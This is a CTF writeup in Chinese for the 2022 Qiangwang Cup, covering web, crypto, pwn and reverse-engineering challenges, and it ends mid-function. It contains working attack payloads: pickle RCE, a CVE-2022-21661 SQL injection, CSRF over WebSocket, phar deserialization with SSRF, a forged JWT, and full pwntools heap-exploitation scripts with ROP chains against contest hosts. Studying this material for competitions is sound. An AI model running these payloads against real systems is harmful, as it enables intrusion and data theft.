Web

crash

垃圾题
python 无R rce

# Hand-written pickle opcode stream (the writeup's "no R opcode" variant): loading it
# with pickle calls os.system('sleep 10'), which is what stalls the backend into the
# 504 described below.
b= b'''(cos
system
S'sleep 10'
o.'''

要返回504让后端超时就可以,多个页面请求睡眠就可以返回504

easylogin

CVE-2022-21661

action=aa&query_vars%5Btax_query%5D%5B1%5D%5Binclude_children%5D=1&query_vars%5Btax_query%5D%5B1%5D%5Bterms%5D%5B1%5D=(UPDATEXML(7430,CONCAT(0x2e,0x71626b7671,(SELECT MID((IFNULL(CAST(userid AS NCHAR),0x20)),1,19) FROM moodle.mdl_user_password_resets ORDER BY id),0x7162707171),3592))&query_vars%5Btax_query%5D%5B1%5D%5Bfield%5D=term_taxonomy_id

注出 8888 应用的 token,利用密码重置功能登录后台,然后在后台上传插件来 rce
flag在etc下

babyweb

随便注册一个账号登录
利用 bugreport 构造 csrf 去修改 admin 密码

// CSRF payload from the writeup: the victim's browser opens the bot socket on
// loopback and pushes a single command, then closes after the first reply.
const ws = new WebSocket('ws://127.0.0.1:8888/bot');
console.log('ws连接状态:' + ws.readyState);

ws.addEventListener('open', () => {
    console.log('ws连接状态:' + ws.readyState);
    // Send one command as soon as the connection is up.
    ws.send('changepw 123456');
});

ws.addEventListener('message', (data) => {
    console.log('接收到来自服务器的消息:');
    console.log(data);
    // Close the WebSocket once the exchange is done.
    ws.close();
});

先用200块买个 hint,读取源码构造负数增加 money

{"product":[{"id":2,"num":-233,"num":0},{"id":1,"num":-233,"num":0}]}

然后钱就够了 买 flag 即可

easyweb

showfile 可以任意文件读 有过滤 先读取源码
随便看看后发现上传 phar 去触发反序列化

<?php
/**
 * Bare property bag (no methods). Presumably mirrors the Upload class of the
 * target application (the writeup says its source was read first); it is
 * declared here but not used by the phar generator below.
 */
class Upload {
    public $file;
    public $filesize;
    public $date;
    public $tmp;
}

/**
 * Bare property bag (no methods). Presumably mirrors the target's GuestShow
 * class; declared here but not used by the phar generator below.
 */
class GuestShow{
    public $file;
    public $contents;
}

/**
 * Bare property bag (no methods). Presumably mirrors the target's AdminShow
 * class; the generator below instantiates it and sets only ->source before
 * storing it as phar metadata.
 */
class AdminShow{
    public $source;
    public $str;
    public $filter;
}

// Build the phar used by the writeup: the AdminShow object (only ->source set) is
// stored as the archive metadata, which is what gets unserialized on the target
// ("upload phar to trigger deserialization" in the text above).
$a = new AdminShow();
$a->source="http://10.10.10.10/";   // internal host; the text below says it was found via /etc/hosts
$b = serialize($a);                  // computed but never used: setMetadata() serializes $a itself

$phar = new Phar("phar.phar");
$phar->startBuffering();
$phar->setStub('GIF89a'."<?php_HALT_COMPLILER();?>");   // GIF magic bytes prefixed to the stub
$phar->setMetadata($a);
$phar->addFromString("test.txt", "test");
$phar->stopBuffering();
rename('phar.phar','guest.jpg');   // final artifact is handed over with an image extension
?>

简简单单构造 poc 去打内网 读取过 /etc/hosts
c 段找到10.10.10.10 可以看到源码
利用 file 协议读取 flag

Crypto

myJWT

java的签名cve,用0去绕过整个签名。审计代码,token分为三段,第一段不用动,第二段的false改成true,然后exp的时间改大一点,base64一下,第三段直接传0,也就是AAAAAAAA就可以了

eyJ0eXAiOiJKV1QiLCJhbGciOiJteUVTIn0=.eyJpc3MiOiJxd2IiLCJuYW1lIjoiYWRtaW4iLCJhZG1pbiI6dHJ1ZSwiZXhwIjoxMDAwMDAwMDAwMDAwMDB9.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==

factor

和d3ctf那个factor一样的paper

from Crypto.Util.number import *
import gmpy2
# Challenge parameters. Instance 1 comes as two related keys (n11/e11/c11 and
# n12/e12/c12) that are attacked together; instances 2 and 3 are single keys
# (n2/e2/c2 and n3/e3/c3). Each step below reuses the previous step's plaintext.
n11=801049932940568005269978912396585741498810389425615966036828877784238116634177290247194019425111606811005728521368879065336038221361037062407029836155148874719789714345603547779284558101833801155509762818376470874215789574939002212274399950433269775325144015468620263028557804618774240232988157961712628677901130814703917513004114547234375629747176834581166306552311075522669403347828095831520693563291249869832390698646691647204371133362254846234990175138047928703289833460734235302093916147489509206061923877623300596194317059884824322527532662470348274079800781120104946546063500763852622187404608639542858285661288293918912184354236687975919510300221932074135531028314170475917110204254042336116619335841213418990605590620842511615815443114612333881430920769002933370887494558640833005339906706603497809846863863967391543647049224309556936909768179259581851520214669904560467640473144481633920438487615788689262961741053146610554997224861331949716721056553499531186695425439163222802917813140266513735841447717418846360096652592844940362932171019143434080184728093326143821165097895058935372215708948088248596585127475770021962501262915274497478428868130455122612016408381607561200802267038869516896665387576895570245272035575637
n12=635401970340205725139325006504978344512744926958688031423448003992072769931808217486709574151492230879374574313457662436423263437792389711379687512056391117410807565492548718691166183372633151644917135272259770997096195518489056319350258673723095417922153182423913759272893696867426193704479752772511081457729513843682588951499551132432923147997238597538055902932123792252593514225328196541483451747314048080824405530742533473914329294346486691684904100406972073037050089861816604505650042953778360621934380815999541183067585498606053857125775979915077329566722531830089714823979965934190338538564188253271016367299890015449611141166780048763403252309160517164569110740561584100839212138661881615351382946813818078899882595313362934594951895560189003438775450675343590147821186953526262224973333962454561275321925151619178204499342339749637758100126893330994252902926509705617882239610380420830791088907378397226817514095468815228186716220057075095711894070032344613244803934541318573847029365563159918970404057137270884587905766828750387753130065274147902379993224780149663600462492281891320702134153853359393588902750423972068679293373333869389393970353760507436913233657422185531482023237384247535554666481760197851108297145147371
e11=1898839980562048754607069073527844852132536432440793106124181406514770178066775988232362054809850074774981836898118651469424148725970708199461113088705044905633592578936333918328544505910996746428679299419879472444790941363558025887620570856598548320246426354974395765243741646121743413447132297230365355148066914830856904433750379114692122900723772114991199979638987571559860550883470977246459523068862898859694461427148626628283198896659337135438506574799585378178678790308410266713256003479022699264568844505977513537013529212961573269494683740987283682608189406719573301573662696753903050991812884192192569737274321828986847640839813424701894578472933385727757445011291134961124822612239865
e12=1262647419018930022617189608995712260095623047273893811529510754596636390255564988827821761126917976430978175522450277907063247981106405519094560616378241247111698915199999363948015703788616554657275147338766805289909261129165025156078136718573006479030827585347458143645738353716189131209398056741864848486818076440355778886993462012533397208330925057305502653219173629466948635110352752162442552541812665607516753186595817376029707777599029040724727499952161261179707271814405907165207904499722122779096230563548011491932378429654764486855147873135769116637484240454596231092684424572258119768093562747249251518965380465994055049411715353547147466711949391814550591591830515262296556050946881
n2=209798341155088334158217087474227805455138848036904381404809759100627849272231840321985747935471287990313456209656625928356468120896887536235496490078123448217785939608443507649096688546074968476040552137270080120417769906047001451239544719039212180059396791491281787790213953488743488306241516010351179070869410418232801398578982244984544906579574766534671056023774009163991804748763929626213884208260660722705479782932001102089367261720194650874553305179520889083170973755913964440175393646890791491057655226024046525748177999422035469428780228224800114202385209306803288475439775037067014297973202621118959024226798935588827359265962780792266516120013602384766460619793738405476219362508944225007365127768741191310079985425349292613888185378948854602285379329682053663283534930182589905986063348509703027498270111412063194971956202729807710253369312175636837558252924035002153389909587349043986253518050303628071319876207392440085675892353421232158925122721273720564784886530611286461575045181073744696415657043278123662980166364494583141297996445429477446442693717498789391918530672770193730629928408766563592081857706608049076318165712479742423149330311238462044666384622153280310696667586565906758451118241914402257039981388209
e2=65537
n3=539779851369541956878655738599584730199799866957191805784596190682932284216781781433367450841202917758999300635019369629627621029957135109806205877317954671312041249493462048283611940752235036153024920172209763260723728345918562258401803973624430150143563078517485996070862532682695228590709019451174548520135142052216785774589096706631010293690859363524584240662502290912412366366114571976050857239915691266377257797199583543940504695517331512813468837128344612227973709974625418257243011036826241599265375741977853552204640800449679679351666009764297016524814036295707311913711955324055690490892097177271718850857268982130811714517356073266905474635370690445031512184247179039751734276906533177939993769044135143389748416635981226449566039039202521305851567296884751935162651063209779647359922622084851547605090230221057349511482738300221222563908357379545905837110168948295030747460300104202323692732549831403834387939156877086852393515817984772384147449841124275061609701453997579569931391166586163299940486204581696722731952467570857217406030804590055255431828403195798003509083922294733709507134156466158642941338493323430671502043066148246348074878064089651235355282144209668143249348243220714471988019011613749340243917652821
e3=8179300978753084587812861894047395225516049110376948812109811319430275614612773726672345893359691900281432484382670047044697374818043512731533402576374645405477207239801498428774783768163880078495448747421425078521981578408638790336528372019271073712013371141939808017049399434858687299480461753638164719404612128939787055797762174745092074547412183349192156638711750872083313795551439465507724807626674514935170104573715458782366469587138508845980490673890245713729782917089910271980557159592807350504157192913530007199510144004848020221181558472160543018733124225266127379373751910439604459368078652499029070936707349862139053913745186413782066470461478961703013591655136140060879250067379283913798867648758171004535775565306842444545755351202796833177560656564652632975685912935281581268141803696686952259539945588609591385807620108279333498170028167338690235117003515264281843953984997958878272347778561933726792473981855755454522886321669676790813189668084373153897754540290867346751033567500922477317530445967753955221454744946208555394588111484610700789566547507402309549957740815535069057837915204852490930168843605732632328017129154852857227895362549146737618906180651623216848500491438142456250653458053922622240299736136335179639180898730269690699965799644757774472147210271111150769048976871249731156387939260749192370361488285775377622944817570292095201906142567403539151179209316853493906909989301225903409448461436855145
c11=18979511327426975645936984732782737165217332092805655747550406443960209507493506811471688957217003792679188427155591583024966608843371190136274378868083075515877811693937328204553788450031542610082653080302874606750443090466407543829279067099563572849101374714795279414177737277837595409805721290786607138569322435729584574023597293220443351227559400618351504654781318871214405850541820427562291662456382362148698864044961814456827646881685994720468255382299912036854657082505810206237294593538092338544641919051145900715456411365065867357857347860000894624247098719102875782712030938806816332901861114078070638796157513248160442185781635520426230183818695937457557248160135402734489627723104008584934936245208116232179751448263136309595931691285743580695792601141363221346329077184688857290503770641398917586422369221744736905117499140140651493031622040723274355292502182795605723573863581253354922291984335841915632076694172921289489383700174864888664946302588049384130628381766560976143458735712162489811693014419190718601945154153130272620025118408017441490090252674737105557818759190934585829634273698371996797545908125156282869589331913665938038870431655063063535672001112420959158339261862052308986374193671007982914711432579
c12=336587005671304527566745948355290412636261748969581976214239578621816863343117433524033533838636941679300497270909696775021031004312477997130741361709262822736904340641138652359632950455651920464042448022467664596484055174270895170499076347333381222768518599018520948098943626229061996126260154604038101543546588917619576702866444998578555907070990331574722135141778182631559802154493815687284077524469331290249057291163803290619701104007028836609832847351748020354798788508790258935718399783002069490123663345156902440501507117289747695510266461539019431610123351176227443612317037899257774045751487135646052309277098939919088029284437221840182769808850184827681307611389353392683707516141736067793897378911235819049432542758429901945202632117089595899280390575706266239252841152490534353760118231918190110043319877744119083811214707593122757409240645257409097436061825613686773916466122693168971062418046703969144004779270391320645495586024342668002497155358623795942692477164489475917351003149045087283510728981096449890130735055015075557614253867698702479920619299919816768972581273507837309179450374634916567083251630203067065663910073926990517108921490442919372774170201239734064819301693527366233007925670043499415100789027665
c2=18352572608055902550350386950073774530453857897248738030380007830701135570310622004368605208336922266513238134127496822199799761713782366178177809597137102612444147565578155260524747439899150012223027218489946124086276814899675563837669559795153349686434242738207425653079514376089070980797596457151965772460109519623572502109592612394316680202287712465721767341302234806130244551387296133051760893033194962691942040228545508895009195291106297581470066545991352668826197346830561010198417527057944507902143965634058848276017283478933675052993657822322866778994956205033704582047618324071045349072526540250707463112668579342537349567247810715604220690215313641329522674080146047291570752430231923566302463491877377617044768978997438596643458475128936850994934029476030136643053997549253792076260765459166618369864942681056864815996253315631930002738854235841120321870075261782250357506436825550088826469396508045912258303652912217151127280959435741419961721418428605515096160344688795655562889755165362006775317188009008288782691705879510655892181975003485714604340542378477388225736316682379616676770234557939471098919647053799313777248678455620231721202780830980063824003076308811540534492317719811588898727134190545533822501681653
c3=113097822337683973761068913398570777162211043704088253732500045618770280334319497174908657828372816818344430304314992760410247741225285170975119344962728883084314382093407445567724674775086423808679124143380073906159023182353116556175251427048715466914368972746661938211846262612414049036821553068430149530397389927209475908905748728402722287875974303298260579839357610962198145974153609818939841880084892796820949226354126424023144300953584658958900737493704530725894948802258740332090822797815745616247879170037794873059391625680745994045522420168248552864215035136318711240256011217929372430302003068882829637056296413462078222453765071094277727760527662423010417144554652783429899139309180017349156600053882338180319473460877576898373222480215735280046214925463242092830060830764299787309912687294672319845054775281463150375545716818434962456139485501224661520991156961587158843064393883274763714930309353593180897123378717852182761518709151878662808890356934477932099818218743384674756674800089177733447066489275506387382342429495897972218764782517198727316942685748481956118012927027254979181519862451112593068440686462293151078537886822555211870303467014484443432209106264020502334805536091587252238173816637270028678636848763
# problem1---paper section5
# Both moduli have the shape n = p^2 * q (see the square roots and the
# (p^2 - p)(q - 1) totients below). Under Sage, n11/n12 is an exact rational and
# one convergent of its continued fraction has numerator q11 and denominator q12.
cf = continued_fraction(n11/n12)
for i in range(2,len(cf)):
    q11 = cf.numerator(i)
    if n11%q11==0:   # the convergent whose numerator divides n11 is the one we want
        q12 = cf.denominator(i)
        break
# NOTE(review): if no convergent divides n11 the loop runs out without binding q12,
# and the next lines fail with NameError.

p11 = gmpy2.iroot(n11//q11,2)[0]   # integer square root of the remaining p^2 cofactor
p12 = gmpy2.iroot(n12//q12,2)[0]
d11 = inverse(e11,(p11**2-p11)*(q11-1))   # phi(p^2 q) = p (p - 1)(q - 1)
d12 = inverse(e12,(p12**2-p12)*(q12-1))
m1 = int(pow(c11, d11, n11))   # the two plaintexts become coefficients in problem 2
m2 = int(pow(c12, d12, n12))
# problem2---paper section4
# NOTE(review): "PR.=" looks like Sage's generator syntax "PR.<x> = PolynomialRing(Zmod(n2))"
# with the "<x>" stripped by the HTML extraction - as written the line does not parse,
# and without it x would be undefined on the next line. Confirm against the original notebook.
PR.=PolynomialRing(Zmod(n2))
f = (m1*m2*x-(m1-m2)).monic()   # linear polynomial in x whose small root is recovered next
x = f.small_roots(X=2^750,beta=0.75,epsilon=0.1)   # Sage preparser: 2^750 is a power, not XOR; x is now a list of roots

g = GCD(int(m1*m2*x[0]-(m1-m2)),n2)   # the evaluated polynomial shares a factor with n2 ...
p2 = gmpy2.iroot(g,6)[0]               # ... namely p2^6, hence the sixth root
q2 = n2//(p2**7)                       # so n2 = p2^7 * q2
print(p2, q2)
phi2 = (p2**7-p2**6)*(q2-1)   # = p2^6 (p2 - 1)(q2 - 1)
d2 = inverse(e2, phi2)
b = int(pow(c2, d2, n2))   # this plaintext feeds problem 3 (it divides e3 there)
# problem3---paper section3
# NOTE(review): same "PR.=" garbling as in problem 2 - presumably "PR.<x> = PolynomialRing(Zmod(n3))".
# Re-binding x to the new ring's generator matters here because x currently holds the
# root list from problem 2.
PR. = PolynomialRing(Zmod(n3))
f = (x*(e3//b)-1).monic()   # b is the problem-2 plaintext; e3//b is its (integer) quotient
x=f.small_roots(X=2^750,beta=0.75,epsilon=0.1)
print(x)
p3 = GCD(int(x[0]*(e3//b)-1),n3)   # gcd with n3 yields p3^6 ...
p3 = gmpy2.iroot(p3,6)[0]          # ... whose sixth root is p3 (variable reused)
q3 = n3//p3**7                     # n3 = p3^7 * q3
print(p3, q3)
phi3 = p3**6*(p3-1)*(q3-1)
d3 = inverse(e3, phi3)
m3 = int(pow(c3,d3,n3))
print(long_to_bytes(m3))

Pwn

house of cat

from pwn import*
r=remote("182.92.222.142",25394)   # contest instance; swap for the process() line below to run locally
#r=process('./house_of_cat')
context.log_level='debug'   # hex-dumps every send/recv

libc=ELF("./libc.so.6")   # the libc shipped with the challenge; the raw offsets further down are tied to this build

r.recvline()                             # banner
r.send("LOGIN | r00t QWBQWXF admin")    # login command, sent without a trailing newline

def new(idx,size,content):
    """Menu option 1 of the challenge service: create slot ``idx`` of ``size`` bytes holding ``content``.

    Waits for the "mew mew mew" prompt, replays the CAT command header, then answers
    each ":" prompt in turn. ``content`` is sent raw (no newline appended).
    """
    r.sendafter("mew mew mew~~~~~~\n", "CAT | r00t QWBQWXF $\xff\xff\xff\xff")
    r.sendlineafter(":\n", "1")
    r.sendlineafter(":\n", str(idx))
    r.sendlineafter(":\n", str(size))
    r.sendafter(":\n", content)

def delete(idx):
    """Menu option 2 of the challenge service: release slot ``idx``.

    Same prompt/CAT-header handshake as new(), then the option and the index.
    """
    r.sendafter("mew mew mew~~~~~~\n", "CAT | r00t QWBQWXF $\xff\xff\xff\xff")
    r.sendlineafter(":\n", "2")
    r.sendlineafter(":\n", str(idx))

def show(idx):
    """Menu option 3 of the challenge service: print slot ``idx``.

    The reply is left in the socket buffer for the caller to read.
    """
    r.sendafter("mew mew mew~~~~~~\n", "CAT | r00t QWBQWXF $\xff\xff\xff\xff")
    r.sendlineafter(":\n", "3")
    r.sendlineafter(":\n", str(idx))

def edit(idx,content):
    """Menu option 4 of the challenge service: overwrite slot ``idx`` with ``content``.

    ``content`` is sent raw (no newline appended), like in new().
    """
    r.sendafter("mew mew mew~~~~~~\n", "CAT | r00t QWBQWXF $\xff\xff\xff\xff")
    r.sendlineafter(":\n", "4")
    r.sendlineafter(":\n", str(idx))
    r.sendafter(":\n", content)

# Main sequence of the exploit script. Every numeric offset below is specific to
# the bundled libc.so.6 (and the heap layout it produces); they will not transfer
# to another build without re-deriving them.
new(0,0x418,"\n")
new(1,0x428,"\n")
new(2,0x418,"\n")

delete(1)
new(15,0x468,"flag")

show(1)
r.recvline()
libc_base=u64(r.recv(8))-0x21a0d0   # 8 leaked bytes minus the offset of the leaked pointer inside libc
success("libc_base: "+hex(libc_base))

# Absolute addresses derived from libc_base (libc-build specific, see note above).
stderr=libc_base+0x21a860
tls=libc_base-0x2890
top_chunk=libc_base+0x219ce0
IO_wstrn_jumps=libc_base+0x215dc0
IO_str_jumps=libc_base+0x2166c0
IO_cookie_read=libc_base+0x215be0
_IO_wfile_jumps=libc_base+0x2160c0
setcontext=libc_base+libc.sym["setcontext"]+61
#0x000000000011388f : mov rdx, qword ptr [rax + 0xb0] ; call qword ptr [rax + 0x88]
gadget=libc_base+0x11388f
pop_rdi=libc_base+0x2a3e5
pop_rsi=libc_base+0x2be51
pop_rdx=libc_base+0x90529
pop_rcx=libc_base+0x8c6bb
pop_r8=libc_base+0x165b76
syscall=libc_base+0x91396
pop_rax=libc_base+0x45eb0

r.recv(8)
heap=u64(r.recv(8))-0x6b0   # second leaked pointer, rebased to the heap start
success("heap: "+hex(heap))

# NOTE(review): fake_IO_struct starts as a str and is concatenated with p64() output,
# which is bytes on Python 3 - this script is written for Python 2 (or needs b"" here).
fake_IO_struct=""
fake_IO_struct=fake_IO_struct.ljust(0x58,"\x00")
fake_IO_struct+=p64(heap+0x570)
fake_IO_struct=fake_IO_struct.ljust(0x64,"\x00")
fake_IO_struct+=p64(1)
fake_IO_struct=fake_IO_struct.ljust(0x78,"\x00")
fake_IO_struct+=p64(heap)
fake_IO_struct=fake_IO_struct.ljust(0x90,"\x00")
fake_IO_struct+=p64(heap+0x1470)
fake_IO_struct=fake_IO_struct.ljust(0xc8,"\x00")
fake_IO_struct+=p64(_IO_wfile_jumps-0x20)
fake_IO_struct=fake_IO_struct.ljust(0x158,"\x00")
fake_IO_struct+=p64(gadget)
fake_IO_struct=fake_IO_struct.ljust(0x178,"\x00")
fake_IO_struct+=p64(setcontext)
fake_IO_struct=fake_IO_struct.ljust(0x1a0,"\x00")
fake_IO_struct+=p64(heap+0x1570)
fake_IO_struct=fake_IO_struct.ljust(0x1d0,"\x00")
fake_IO_struct+=p64(heap+0x1470)
fake_IO_struct=fake_IO_struct.ljust(0x290,"\x00")
fake_IO_struct+=p64(heap+0x1670)+p64(pop_rdi)
fake_IO_struct=fake_IO_struct.ljust(0x2f0,"\x00")
fake_IO_struct+=p64(heap+0xf10)+p64(pop_rsi)+p64(0)+p64(pop_rax)+p64(0x2)+p64(syscall)
fake_IO_struct+=p64(pop_r8)+p64(3)+p64(pop_rdi)+p64(0xA0000)+p64(pop_rsi)+p64(0x1000)+p64(pop_rdx)+p64(1)+p64(0)+p64(pop_rcx)+p64(1)+p64(libc_base+libc.sym["mmap"])
fake_IO_struct+=p64(pop_rdi)+p64(1)+p64(pop_rsi)+p64(0xA0000)+p64(pop_rdx)+p64(0x30)+p64(0)+p64(libc_base+libc.sym["write"])

new(10,0x418,"\n")
new(3,0x418,fake_IO_struct)
new(4,0x418,"\n")
new(5,0x448,"\n")
new(6,0x418,"\n")
new(7,0x438,"\n")
new(8,0x418,"\n")

delete(1)
new(11,0x468,"\n")

delete(3)
edit(1,p64(libc_base+0x21a0d0)+p64(libc_base+0x21a0d0)+p64(heap+0x6c0)+p64(stderr-0x20))
new(14,0x468,"\n")

delete(5)
new(13,0x468,"\n")
delete(7)
edit(5,p64(libc_base+0x21a0e0)+p64(libc_base+0x21a0e0)+p64(heap+0x1740)+p64(top_chunk-0x20))
#gdb.attach(r,"b _IO_wdoallocbuf")

# Inline copy of the new() handshake for slot 12 / size 0x468, stopping before the
# content send (the size is sent with sendline here, as in new()).
r.recvuntil("mew mew mew~~~~~~\n")
r.send("CAT | r00t QWBQWXF $\xff\xff\xff\xff")
r.recvuntil(":\n")
r.sendline("1")
r.recvuntil(":\n")
r.sendline(str(12))
r.recvuntil(":\n")
r.sendline(str(0x468))

r.interactive()

qwarmup

from pwn import*
#r=remote("127.0.0.1",9999)
#r=remote("121.40.213.105",12001)
r=process('./qwarmup')   # local run; the two remote() lines above (local test and contest target) are kept commented
context.log_level='debug'   # hex-dumps every send/recv

libc=ELF("./libc-2.35.so")   # glibc 2.35 build shipped with the challenge; symbol lookups and raw offsets below assume it

def write(offset,content):
    """Push ``content`` to the service one byte at a time, starting at ``offset``.

    For every byte the position is sent as an 8-byte word (p64), then the byte
    itself, and the service is expected to answer "Success!" before the next pair.
    Iterating ``content`` directly yields single characters for a str (the form
    this script uses); a bytes object would yield ints instead.
    """
    for step, byte in enumerate(content):
        r.send(p64(offset + step))
        r.send(byte)
        r.recvuntil("Success!")

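def rol(num,shift):
    """Rotate the 64-bit value ``num`` left by ``shift`` bits.

    Args:
        num: integer treated as an unsigned 64-bit word; higher bits are masked off.
        shift: number of bit positions to rotate; values >= 64 wrap around.

    Returns:
        The rotated value as an int in ``[0, 2**64)``.

    The previous body was ``(num<<1)&0xFFFFFFFFFFFFFFFF+(num&0x8000000000000000)``, which
    Python parses as ``(num<<1) & (MASK + (num & TOP))`` because ``+`` binds tighter than
    ``&``: the bit shifted out at the top was never brought back into bit 0, and for inputs
    with bit 63 set a bit 64 could survive the mask. This version is a true rotate.
    """
    mask = 0xFFFFFFFFFFFFFFFF
    num &= mask
    shift %= 64
    if shift == 0:
        return num
    # Bits pushed out at the top re-enter at the bottom.
    return ((num << shift) | (num >> (64 - shift))) & mask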

# Main sequence of the exploit script. Every raw offset below is specific to the
# bundled libc-2.35.so and the binary's layout; they will not transfer to another build.
r.send(p32(0xF0000))
write(0x3592d0,"\x70")

write(0x30e770,p32(0xfbad1800))
write(0x30e770+0x20+0x8,"\xFF")

write(0x359108+0x22,"_IO_flush_all")

r.send(p64(0x359338))
gdb.attach(r, "b _IO_cookie_read")   # debugger attach left enabled: needs a terminal and pauses the run - disable for unattended use
r.send("\xb8")

r.recv(5)
libc_base=u64(r.recv(8))-0x21ba70   # 8 leaked bytes minus the libc-internal offset of the leaked pointer
success("libc_base: "+hex(libc_base))

# Absolute addresses derived from libc_base (libc-build specific, see note above).
setcontext=libc_base+libc.sym["setcontext"]
pop_rdi=libc_base+0x2a3e5
pop_rsi=libc_base+0x2be51
pop_rdx=libc_base+0x90529
pop_rcx=libc_base+0x8c6bb
pop_r8=libc_base+0x165b76
syscall=libc_base+0x91396
pop_rax=libc_base+0x45eb0
#0x00000000001675b0 : mov rdx, qword ptr [rdi + 8] ; mov qword ptr [rsp], rax ; call qword ptr [rdx + 0x20]
gadget=libc_base+0x1675b0
base=libc_base-0xf3ff0

write(0x359338,"\x78")

write(0x30e770,p64(base))
write(0x30e690+0xd8,p64(libc_base+0x215b80+0x58))
write(0x30e690+0x28,"\x01")
write(0x30e690+0xe8,p64(rol(gadget,0x11)))   # rol() is the 64-bit rotate helper defined above
write(0xf1760,p64(0))

# NOTE(review): "flag" (str) is concatenated with p32()/p64() output, which is bytes on
# Python 3 - this script is written for Python 2 (or needs b"" literals here).
payload="flag"+p32(0)+p64(base)+p64(0)*0x2+p64(setcontext+61)
payload=payload.ljust(0xa0,"\x00")
payload+=p64(base+0x100)+p64(pop_rdi)
payload=payload.ljust(0x100,"\x00")

payload+=p64(base)+p64(pop_rsi)+p64(0)+p64(pop_rax)+p64(2)+p64(syscall)
payload+=p64(pop_rdi)+p64(3)+p64(pop_rsi)+p64(base)+p64(pop_rdx)+p64(0x50)+p64(0)+p64(libc_base+libc.sym["read"])
payload+=p64(pop_rdi)+p64(1)+p64(libc_base+libc.sym["write"])

write(0,payload)

r.send(p64(0x359338))

r.send("\xb8")

r.interactive()

Re

Gamemaster

dnspy 反编译,对gamemessage里的数据先异或 34 再 AES解密一下,key在dnspy中能找到。

源程序里将 gamemessage 里的数据解密后反序列化为了一个对象,这里我们解密出来,找到 MZ 开始的 PE 文件头,将数据提取出来写入新文件中就得到了一个 .NET 文件,但是无法执行,使用 dnspy 反编译能看到代码,传入的 3 个参数不清楚,但是这 3 个参数经过线性反馈移位寄存器计算以后的值我们是知道的。用 z3 解一下方程,解出来 x y 正确 z 不对,选择爆破 z,得到正确的 z 以后直接异或就是 flag

from z3 import *

# Unknown 32-bit initial states of the three shift registers.
x = BitVec('x', 32)
y = BitVec('y', 32)
z = BitVec('z', 32)

KeyStream = [0] * 40   # 40 symbolic output bytes, assembled one bit at a time
num = -1               # index of the byte currently being filled

# Clock the three registers 320 times (40 bytes x 8 bits) and rebuild the combiner
# output, mirroring the generator described in the writeup.
for i in range(0, 320):
    # Feedback: the XOR of the tapped bits becomes the new low bit of each register.
    x = (((x >> 29 ^ x >> 28 ^ x >> 25 ^ x >> 23) & 1) | x << 1)
    y = (((y >> 30 ^ y >> 27) & 1) | y << 1)
    z = (((z >> 31 ^ z >> 30 ^ z >> 29 ^ z >> 28 ^ z >> 26 ^ z >> 24) & 1) | z << 1)
    if i % 8 == 0:
        num += 1
    # NOTE(review): on z3 BitVecs ">>" is an arithmetic (sign-extending) shift, and
    # "z >> 32" on a 32-bit vector shifts out every bit - confirm this matches the
    # integer widths of the original program.
    KeyStream[num] = ((KeyStream[num] << 1) | ((((z >> 32 & 1 & (x >> 30 & 1)) ^ (((z >> 32 & 1) ^ 1) & (y >> 31 & 1))))))
# Constrain every reconstructed byte to the observed keystream (`first`) and ask
# z3 for initial states that produce it; print the model, or "NO" if unsatisfiable.
solver = Solver()
solver.add(*[KeyStream[pos] == first[pos] for pos in range(40)])
print(solver.model() if solver.check() == sat else "NO")

# Recovered initial states (z brute-forced, per the writeup).
y = 868387187
x = 156324965
z = 3131229747

arr = [x, y, z]

# Expand the three 32-bit words into 12 key bytes, least-significant byte first.
key = [(word >> (8 * j)) & 0xff for word in arr for j in range(4)]

# XOR the ciphertext with the repeating 12-byte key.
flag = b''.join(
    (enc[i] ^ key[i % len(key)]).to_bytes(1, 'little') for i in range(len(enc))
)
print(flag)

easyapk

2022强网杯 Writeup by X1cT34m-小绿草信息安全实验室

这里的 v144 动态调试,动态调试发现是一个固定值,正好是0x9e3779b9 ,tea加密算法的特征,下方就是tea加密算法

key 赋值的地方

2022强网杯 Writeup by X1cT34m-小绿草信息安全实验室

key计算脚本

#include 
#include 
#include 
#include 
#include 
/*
 * Recompute the four TEA key words and the round constant ("detal" = delta) the
 * way the app derives them from the clock, mirroring the decompiled expressions
 * (per the writeup). Prints the five values space-separated and returns 0.
 *
 * Note: time(0) is sampled separately for every word, so a run that straddles a
 * second boundary mixes two timestamps. Only bits 28-31 of each sample are used
 * (all masks are 0x?0000000), so the derived values change roughly every 2^28 s.
 */
int main()
{
    // char key[] = {"hello_tea_hello!"};
    uint32_t key[4] = {858927408, 926299444, 1650538808, 1717920867};   /* every word is overwritten below */
    uint32_t v15 = time(0);
    key[0] = ((v15 & 0x20000000) - (v15 & 0xD0000000) + 2 * (v15 & 0x50000000) + 705251522) ^ 0xB93B79F2;
    uint32_t v16 = time(0);
    key[1] = ((v16 & 0x10000000) - (v16 & 0xE0000000) + 2 * (v16 & 0x60000000) + 268614163) ^ 0x47348F27;
    uint32_t v17 = time(0);
    key[2] = ((v17 & 0x50000000) - (v17 & 0xA0000000) + 2 * (v17 & 0x20000000) + 1598838216) ^ 0xDD2D6CF0;
    uint32_t v18 = time(0);
    /* In C, ^ binds tighter than |, so this reads as ((... ^ 0x30240060) | 0x99A9B9D) + 2 * (...). */
    key[3] = (((v18 & 0x40000000) - (v18 & 0xB0000000) + 2 * (v18 & 0x30000000) + 1085702636) ^ 0x30240060 | 0x99A9B9D)
          + 2 * (((v18 & 0x40000000) - (v18 & 0xB0000000) + 2 * (v18 & 0x30000000) + 1085702636) ^ 0x46D3E58F);
    uint32_t v148 = time(0);
    /* Same precedence note as key[3]. */
    uint32_t detal = (((v148 & 0x30000000) - (v148 & 0xC0000000) + 2 * (v148 & 0x40000000) + 0x35970C13) ^ 0xF4170810 | 0x1C88647) + 2 * (((v148 & 0x30000000) - (v148 & 0xC0000000) + 2 * (v148 & 0x40000000) + 0x35970C13) ^ 0xBA075AA);
    printf("%u %u %u %u %u",key[0],key[1],key[2],key[3],detal);   /* no trailing newline */
    return 0;
}

密文enc在check函数里用memcmp比较,导出套一个tea脚本就行

#include 
#include 
#include 
#include 

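/*
 * TEA encryption of one 64-bit block (v[0], v[1]) under the 128-bit key k[0..3].
 *
 * Uses the standard schedule - delta 0x9e3779b9, 32 rounds - so that decrypt()
 * below, which starts from sum = 32 * delta = 0xC6EF3720, is its exact inverse.
 * The previous version used delta 0xdeadbeef and 48 rounds, which decrypt()
 * cannot undo; nothing on this page called it with those parameters.
 *
 * v: in/out block   k: key words (read only)
 */
void encrypt (uint32_t* v, uint32_t* k) {
    uint32_t v0=v[0], v1=v[1], sum=0, i;           /* set up */
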